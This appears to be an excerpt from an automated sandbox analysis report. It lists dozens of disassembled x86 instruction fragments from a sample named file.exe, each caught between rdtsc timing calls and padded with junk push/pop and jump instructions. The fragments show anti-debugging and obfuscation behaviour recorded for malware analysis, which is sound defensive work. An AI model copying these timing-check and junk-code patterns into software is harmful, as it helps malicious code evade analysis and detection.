Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B8932 second address: 2B8965 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA93D08FA1Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B8965 second address: 2B89B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a movsx ecx, dx 0x0000000d lea eax, dword ptr [ebp+124823DAh] 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FA93CFE6D58h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov edx, dword ptr [ebp+122D2518h] 0x00000033 nop 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B89B0 second address: 2B89B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B89B4 second address: 2B89DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FA93CFE6D6Ch 0x0000000c jmp 00007FA93CFE6D66h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B89DE second address: 2B89E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B89E2 second address: 2B89E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B89E8 second address: 29F48B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA93D08FA29h 0x00000008 jmp 00007FA93D08FA23h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FA93D08FA18h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a xor dx, 680Dh 0x0000002f sub edx, dword ptr [ebp+122D17F7h] 0x00000035 call dword ptr [ebp+12451AD3h] 0x0000003b pushad 0x0000003c pushad 0x0000003d jne 00007FA93D08FA16h 0x00000043 push esi 0x00000044 pop esi 0x00000045 popad 0x00000046 js 00007FA93D08FA1Ch 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FB50B second address: 2FB524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA93CFE6D63h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FB524 second address: 2FB52A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FB52A second address: 2FB55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FA93CFE6D81h 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FA93CFE6D67h 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jng 00007FA93CFE6D56h 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FB838 second address: 2FB83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FB9CD second address: 2FB9D7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FB9D7 second address: 2FB9DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FBB00 second address: 2FBB1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D64h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FBC79 second address: 2FBC8B instructions: 0x00000000 rdtsc 0x00000002 js 00007FA93D08FA16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FA93D08FA1Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FF9FC second address: 2FFA0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FFB70 second address: 2FFB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30231D second address: 302327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 302327 second address: 30233C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FA93D08FA1Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30201B second address: 30201F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 306FEF second address: 307014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007FA93D08FA29h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30682E second address: 306843 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FA93CFE6D5Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 306843 second address: 306848 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3069EC second address: 306A18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FA93CFE6D68h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 306A18 second address: 306A1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 306CEF second address: 306D21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D5Ch 0x00000007 jmp 00007FA93CFE6D64h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jg 00007FA93CFE6D56h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30AFC9 second address: 30AFCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30A26D second address: 30A271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30A408 second address: 30A40D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30A40D second address: 30A42C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FA93CFE6D62h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30A42C second address: 30A444 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA93D08FA1Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FA93D08FA16h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30A591 second address: 30A5AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30A5AF second address: 30A5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30A5B3 second address: 30A5B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30A9D3 second address: 30A9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 jo 00007FA93D08FA22h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30A9E4 second address: 30A9EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30A9EA second address: 30A9F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30A9F1 second address: 30A9F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31085C second address: 310881 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA93D08FA16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FA93D08FA2Bh 0x00000010 jmp 00007FA93D08FA25h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 310881 second address: 310899 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FA93CFE6D5Ah 0x00000008 jns 00007FA93CFE6D56h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 310899 second address: 31089D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30F237 second address: 30F25F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA93CFE6D69h 0x0000000e jno 00007FA93CFE6D56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30F25F second address: 30F273 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2813B2 second address: 2813D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D66h 0x00000007 ja 00007FA93CFE6D56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B8278 second address: 2B827C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B827C second address: 2B8286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B8286 second address: 2B828A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B828A second address: 2B82E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007FA93CFE6D60h 0x0000000e pushad 0x0000000f jnc 00007FA93CFE6D56h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 nop 0x00000019 mov edi, dword ptr [ebp+122D37C5h] 0x0000001f mov ch, bl 0x00000021 mov ebx, dword ptr [ebp+12482419h] 0x00000027 mov edx, dword ptr [ebp+122D1B9Fh] 0x0000002d pushad 0x0000002e mov dword ptr [ebp+122D2DCEh], esi 0x00000034 pushad 0x00000035 push edi 0x00000036 pop ecx 0x00000037 mov cx, ax 0x0000003a popad 0x0000003b popad 0x0000003c add eax, ebx 0x0000003e push ebx 0x0000003f jmp 00007FA93CFE6D65h 0x00000044 pop edx 0x00000045 push eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edi 0x00000049 pop edi 0x0000004a pop eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B82E9 second address: 2B82ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B82ED second address: 2B830C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D379Dh] 0x00000010 push 00000004h 0x00000012 jg 00007FA93CFE6D58h 0x00000018 push eax 0x00000019 push eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 318C4E second address: 318C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA93D08FA16h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 318C5D second address: 318C71 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA93CFE6D5Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 318C71 second address: 318C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 318C75 second address: 318C79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 316CA6 second address: 316CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA93D08FA20h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 316CBA second address: 316CCC instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA93CFE6D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FA93CFE6D56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 316CCC second address: 316CEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FA93D08FA16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA93D08FA1Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 316CEA second address: 316CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 316CEE second address: 316CF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 316CF2 second address: 316D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 316D00 second address: 316D3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FA93D08FA21h 0x0000000e jmp 00007FA93D08FA1Bh 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 jng 00007FA93D08FA16h 0x0000001c jmp 00007FA93D08FA27h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 316D3E second address: 316D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3170E9 second address: 317100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA93D08FA23h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 317100 second address: 31711E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FA93CFE6D56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d js 00007FA93CFE6D56h 0x00000013 pop ecx 0x00000014 popad 0x00000015 pushad 0x00000016 jo 00007FA93CFE6D5Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31744E second address: 3174B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA93D08FA27h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007FA93D08FA25h 0x00000013 pushad 0x00000014 jmp 00007FA93D08FA21h 0x00000019 js 00007FA93D08FA16h 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FA93D08FA20h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3174B0 second address: 3174B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3177A6 second address: 3177C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007FA93D08FA22h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31836C second address: 318383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D63h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 318383 second address: 318389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 321027 second address: 32102B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32102B second address: 32102F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32102F second address: 32103B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32103B second address: 32103F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32103F second address: 32105C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA93CFE6D5Ch 0x0000000e jp 00007FA93CFE6D58h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3201BC second address: 3201D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b push esi 0x0000000c jg 00007FA93D08FA16h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 320605 second address: 320624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA93CFE6D5Dh 0x00000011 jnp 00007FA93CFE6D56h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3285B4 second address: 3285C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3285C0 second address: 3285E7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FA93CFE6D71h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 328A35 second address: 328A6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA22h 0x00000007 jp 00007FA93D08FA16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jp 00007FA93D08FA22h 0x00000015 push edi 0x00000016 jp 00007FA93D08FA16h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 328BBE second address: 328BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 328BC4 second address: 328BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 328BC9 second address: 328BD3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA93CFE6D5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32919A second address: 3291B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA93D08FA23h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3291B6 second address: 3291C8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA93CFE6D56h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3299C4 second address: 3299D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 je 00007FA93D08FA16h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 328023 second address: 328027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 328027 second address: 32803B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FA93D08FA16h 0x0000000e jnc 00007FA93D08FA16h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 275625 second address: 275650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FA93CFE6D66h 0x0000000b jmp 00007FA93CFE6D5Eh 0x00000010 popad 0x00000011 rdtsc
